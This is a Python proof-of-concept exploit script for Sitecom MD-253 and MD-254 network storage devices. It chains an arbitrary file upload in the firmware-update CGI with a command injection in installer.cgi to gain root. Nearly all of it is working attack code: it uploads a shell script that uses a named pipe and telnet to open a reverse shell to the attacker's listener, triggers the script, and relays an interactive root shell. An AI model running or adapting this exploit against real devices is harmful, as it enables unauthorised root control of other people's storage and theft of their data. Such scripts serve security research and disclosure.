Sitecom MD-25x - Multiple Vulnerabilitie/ Reverse Root Shell Exploit



#!/usr/bin/python

#
# Exploit Title: Sitecom MD-253 and MD-254 Network Storage Reverse Shell Exploit
# Date: 09/11/12
# Exploit Author: Mattijs van Ommeren (mattijs _ at _ alcyon _ dot _nl)
# Vendor Homepage: http://www.sitecom.com
# Software Link: http://www.sitecom.com/download/5012/SitecomNas.2.4.17.bin
# Version: 2.4.17 and below
# Tested on: Windows 7 x64 and Backtrack 5 R1
# CVE : N/A
#
# This PoC exploit code demonstrates how several bugs in Sitecom MD-253 and MD-254 Network Storage
# devices can be combined to obtain a root shell.
#
# Firmware versions up to and including 2.4.17 are affected by the following vulnerabilities:
#
# 1. The /cgi-bin/upload CGI used by the firmware update function allows arbitrary file uploads that are:
#     - granted execute permissions 
#     - not removed after uploading if they don't contain valid firmware
#     - stored in a predictable location
# 2. Installer.cgi contains a command injection vulnerability that allows one to run arbitrary commands as
#    root (only a limited character set can be used due to URL-encoding by CGI-handler)
#
# Known Limitations:
#    - Crude heuristics to determine whether a pseudo prompt needs to be echoed to stderr
#
# Vulnerability Details:
#    - http://www.alcyon.nl/advisories/aa-007
#    - http://www.alcyon.nl/advisories/aa-008
#
# Latest version of this exploit:
#   - http://www.alcyon.nl/blog/sitecom-poc-exploit
#

import sys
import os
import socket
import thread
import datetime
from optparse import OptionParser

upload_url = '/cgi-bin/upload'
cmd_inj_url = '/cgi-bin/installer.cgi?SetExecTable&%s'
sh_name = 'revsh'

sh_script = """
#!/bin/sh
mknod /tmp/backpipe p
telnet %s %s 0</tmp/backpipe | /bin/sh -C 1>/tmp/backpipe 2>/tmp/backpipe
# clean up our mess
rm -f /tmp/backpipe
rm -f /tmp/%s
""".rstrip('\r')

headers = """Host: %s\r
User-Agent: Mozilla/5.0 (PwNAS 1.0; rv:1.0)\r
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r
Accept-Language: en-us,en;q=0.5\r
Proxy-Connection: close\r
Referer: http://%s/firmware.htm\r
Cookie: language=en;\r\n"""

class Exploit:

    def stdin_thread(self, sock):
        try:
            fd = sys.stdin.fileno()
            while True:
                data = os.read(fd, 1024)
                if not data:
                    break
                while True:
                    nleft = len(data)
                    nleft -= sock.send(data)
                    if nleft == 0:
                        break
        except:
            pass
        sock.close()
        self.running = False

    def stdout_thread(self, sock):
        last = datetime.datetime.now()    
        try:
            fd = sys.stdout.fileno()
            while True:
                if (datetime.datetime.now()-last<datetime.timedelta(milliseconds=500)):
                    sys.stderr.write('# '); # Insert fake prompt
                last = datetime.datetime.now()
                data = sock.recv(1024)
                if not data:
                    break
                while True:
                    nleft = len(data)
                    nleft -= os.write(fd, data)
                    if nleft == 0:
                        break
        except Exception as e:
            print e
            pass
        sock.close()
        self.running = False

    def parse_options(self):
        parser = OptionParser(usage="usage: %prog [options]")
        parser.add_option("-r", "--remote-host", action="store", type="string", dest="hostname", 
            help="Specify the host to connect to")
        parser.add_option("-l", "--listener-address", action="store", type="string", dest="listener_ip", 
            help="Target IP for reverse shell connection")
        parser.add_option("-p","--port",action="store",type="int",dest="port",
            help="TCP port for the reverse shell connection")

        parser.set_defaults(hostname=None, listener_ip=None, port=7777)
        (options, args) = parser.parse_args();

        if(options.hostname == None):
            sys.stdout.write("Remote hostname/IP required\n")
            parser.print_help()
            sys.exit()
        
        #self.forced_bind = (options.listener_ip != None)
        self.listener_ip = options.listener_ip        
        self.hostname = options.hostname
        self.port = options.port

    def start_local_listener(self):
        self.serv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.serv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR,  1)

        try:
            self.serv.setsockopt(socket.SOL_SOCKET, socket.TCP_NODELAY, 1)
        except socket.error:
            sys.stderr.write("[-] Unable to set TCP_NODELAY")
        
        try:
            self.serv.bind((self.listener_ip, self.port))
        except:
            print "[-] Unable to bind to given IP-address. Attempting to bind on default address. You probably need a #NAT/PAT rule if you're behind a firewall."         
            try:
                self.serv.bind(('', self.port))
            except:
                print "[-] Unable to bind to default address. Aborting."
                sys.exit(2)

        print "[*] Listener started on %s:%s" % (self.serv.getsockname()[0], self.port)
            
        self.serv.listen(5)
        self.clientsock, addr = self.serv.accept()
        print "[*] Incoming connection from %s:%s" % (self.clientsock.getsockname()[0], self.clientsock.getsockname()[1])
        self.clientsock.send('/bin/busybox uname -a\n');
        banner = self.clientsock.recv(2048)
        if (banner.find('Linux'))>=0:
            print "[*] W00t W00t, got shell!\n\n%s\n" % banner        
        thread.start_new_thread(self.stdin_thread, (self.clientsock,))
        thread.start_new_thread(self.stdout_thread, (self.clientsock,))
        
    def connect_socket(self):
        print "[*] Connecting..."
        try:
            self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            self.socket.connect( (self.hostname, 80) )
            if not self.listener_ip:
                self.listener_ip = self.socket.getsockname()[0]
            print "[*] Connected to %s (%s) " % (self.hostname, self.socket.getpeername()[0])
        except Exception as inst:
            print inst
            print "[-] Unable to connect"
            sys.exit(2)
            
    def upload_payload(self):
        print "[*] Uploading payload\n"
        try:
            self.socket.send('POST %s HTTP/1.1\n' % upload_url)
            self.send_headers()
            ct = 'Content-Type: multipart/form-data; boundary=---------------------------41184676334\r\n'
            begin_file='-----------------------------41184676334\r\n\
Content-Disposition: form-data; name="file"; filename="%s"\r\n\
Content-Type: application/octet-stream\r\n\r'
            end_file='\r\n-----------------------------41184676334--\r\n'
            pl = ''.join([begin_file, sh_script, end_file]) % (sh_name, self.listener_ip, self.port, sh_name)
            cl = 'Content-Length: %s\r\n\r\n' % (len(pl))
            crlf = '\r\n'
            data = ''.join([ct,cl,pl,crlf])
            self.socket.send(data)
            if self.socket.recv(2048).find("200 OK")>=0 and self.socket.recv(2048).find('/tmp/'+sh_name)>=0:
                print "[*] Payload succesfully uploaded"
                self.socket.close()
            else:
                print "[-] Unexpected response. Trying to proceed anyway."                
        except:
            print "[-] Error uploading payload. Aborting."
            sys.exit(2)
            
    def send_headers(self):
        data = headers %(self.hostname, self.hostname)
        self.socket.send(data)
    
    def execute_payload(self):
        print "[*] Executing payload"
        cmd = '/tmp/' + sh_name
        req = 'GET %s HTTP/1.1\r\n' % (cmd_inj_url % cmd)
        cr = '\r\n'
        self.socket.send(''.join([req,cr])) 
        self.send_headers()
        if self.socket.recv(2048).find("200 OK")>=0:
            print "[*] Finished executing payload"
        self.socket.close()

    def run(self):
        self.line_buf = ''
        self.prompt = False
        self.parse_options()
        self.connect_socket()
        thread.start_new_thread(self.start_local_listener, ())
        self.upload_payload()
        self.connect_socket()
        self.execute_payload()
        print "[*] Waiting for reverse shell connection"
        self.running = True
        while self.running:
            pass
        
exploit = Exploit()
exploit.run()